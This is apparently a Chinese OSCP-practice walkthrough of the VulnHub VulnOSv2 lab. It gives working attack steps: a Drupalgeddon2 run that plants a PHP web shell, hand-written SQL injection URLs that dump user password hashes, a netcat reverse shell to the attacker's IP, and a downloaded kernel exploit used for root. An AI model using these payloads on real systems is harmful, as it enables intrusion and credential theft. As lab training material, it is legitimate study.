前言
oscp备考,oscp系列——VulnOSv2靶场,两种方法获取低权限shell
难度简单
- 对于低权限shell获取涉及:drupal 7 getshell漏洞,opendocman sql注入,ssh连接
- 对于提权:内核提权
下载地址:
https://www.vulnhub.com/entry/vulnos-2,147/
nmap
主机发现
└─# nmap -sn 192.168.88.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 21:21 CST
Nmap scan report for 192.168.88.1 (192.168.88.1)
Host is up (0.00083s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.88.2 (192.168.88.2)
Host is up (0.00024s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 192.168.88.191 (192.168.88.191)
Host is up (0.00020s latency).
MAC Address: 00:0C:29:9E:4C:73 (VMware)
Nmap scan report for 192.168.88.254 (192.168.88.254)
Host is up (0.00027s latency).
MAC Address: 00:50:56:FD:D2:B0 (VMware)
Nmap scan report for 192.168.88.189 (192.168.88.189)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.95 seconds
端口扫描
└─# nmap --min-rate 10000 -p- 192.168.88.191
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 21:22 CST
Nmap scan report for 192.168.88.191 (192.168.88.191)
Host is up (0.00070s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6667/tcp open irc
MAC Address: 00:0C:29:9E:4C:73 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 50.69 seconds
详细端口扫描
└─# nmap -sV -sT -sC -O -p22,80,6667 192.168.88.191
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 21:25 CST
Nmap scan report for 192.168.88.191 (192.168.88.191)
Host is up (0.00060s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
| 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_ 256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: VulnOSv2
|_http-server-header: Apache/2.4.7 (Ubuntu)
6667/tcp open irc ngircd
MAC Address: 00:0C:29:9E:4C:73 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.93 seconds
信息收集
nmap没有什么收获,查看一下web页面
根据提示,点击进入
之后获取到cms:Drupal 7
└─$ whatweb http://192.168.88.191/jabc/
http://192.168.88.191/jabc/ [200 OK] Apache[2.4.7], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[192.168.88.191], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.5.9-1ubuntu4.14], Script[text/javascript], Title[JABC | Just Another Bioware Company], UncommonHeaders[x-generator], X-Powered-By[PHP/5.5.9-1ubuntu4.14]
漏洞利用
直接获取shell,Drupal 7getshell
搜索一下Drupal 7,发现存在,尝试利用
─$ searchsploit -p 44449
Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
URL: https://www.exploit-db.com/exploits/44449
Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
Codes: CVE-2018-7600
Verified: True
File Type: Ruby script, ASCII text
┌──(kali㉿192)-[~/桌面/测试]
└─$ cp /usr/share/exploitdb/exploits/php/webapps/44449.rb 44449.rb
发现报错
搜索一下,发现需要安装
sudo gem install highline
然后直接执行
└─$ ruby 44449.rb http://192.168.88.191/jabc/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.88.191/jabc/
--------------------------------------------------------------------------------
[!] MISSING: http://192.168.88.191/jabc/CHANGELOG.txt (HTTP Response: 404)
[!] MISSING: http://192.168.88.191/jabc/core/CHANGELOG.txt (HTTP Response: 404)
[+] Found : http://192.168.88.191/jabc/includes/bootstrap.inc (HTTP Response: 200)
[!] WARNING: Could be a false-positive [1-1], as the file could be reported to be missing
[!] MISSING: http://192.168.88.191/jabc/includes/bootstrap.inc (HTTP Response: 200)
[!] MISSING: http://192.168.88.191/jabc/core/includes/bootstrap.inc (HTTP Response: 404)
[!] MISSING: http://192.168.88.191/jabc/includes/database.inc (HTTP Response: 404)
[+] Found : http://192.168.88.191/jabc/ (HTTP Response: 200)
[+] Metatag: v7.x [Generator]
[!] MISSING: http://192.168.88.191/jabc/ (HTTP Response: 200)
[+] Drupal?: v7.x
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo ZGGUVOYP
[+] Result : ZGGUVOYP
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://192.168.88.191/jabc/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://192.168.88.191/jabc/shell.php' -d 'c=hostname'
VulnOSv2>> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
获取到了www-data用户权限
opendocman sql注入,ssh连接
手工注入
发现这个页面什么东西都没有
查看一下网页源码,得到提示
For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest
访问/jabcd0cs/目录
然后使用guest/guest进行登录,发现是OpenDocMan v1.2.7,搜索一下漏洞
发现存在sql注入
漏洞url为
/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9
因为oscp+考试不允许使用sqlmap,所以需要手工注入
查表名
http://192.168.88.191/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT 1,(select(group_concat(table_name))from(infoRmation_schema.tables)where(table_schema)like(database())),3,4,5,6,7,8,9
得到
odm_access_log,odm_admin,odm_category,odm_data,odm_department,odm_dept_perms,odm_dept_reviewer,odm_filetypes,odm_log,odm_odmsys,odm_rights,odm_settings,odm_udf,odm_user,odm_user_perms
先看看odm_admin发现不行,看看odm_user,查列名,这里过滤了单引号,可以使用16进制绕过
http://192.168.88.191/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT 1,(select(group_concat(column_name))from(infoRmation_schema.columns)where(table_schema)like(database())AND(table_name)like(0x6f646d5f75736572)),3,4,5,6,7,8,9
得到
id,username,password,department,phone,Email,last_name,first_name,pw_reset_code
查找账号和密码
http://192.168.88.191/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT 1,(select(group_concat(concat(username,0x2d,password)))from(odm_user)),3,4,5,6,7,8,9
得到
webmin-b78aae356709f8c31118ea613980954b,guest-084e0343a0486ff05530df6c705c8bb4
hash解密
使用hash-identifier识别一下,是md5
进行解密
webmin/webmin1980
guest/guest
guest登录
ssh登录
尝试ssh登录,webmin用户登录成功
ssh webmin@192.168.88.191
ssh guest@192.168.88.191
提权
先反弹一下shell,这个shell环境不行,连cd /tmp都执行不了
nc 192.168.88.189 6666 -e /bin/sh
内核提权
Linux 3.13
发现版本比较低,先尝试牛脏提权,靶机直接没了,幸好提前拍了快照
之后找到一个符合的脚本
尝试利用
cp /usr/share/exploitdb/exploits/linux/local/37292.c 37292.c
python -m http.server 80
wget http://192.168.88.189/37292.c
gcc 37292.c -o 37292
./37292
获取root权限
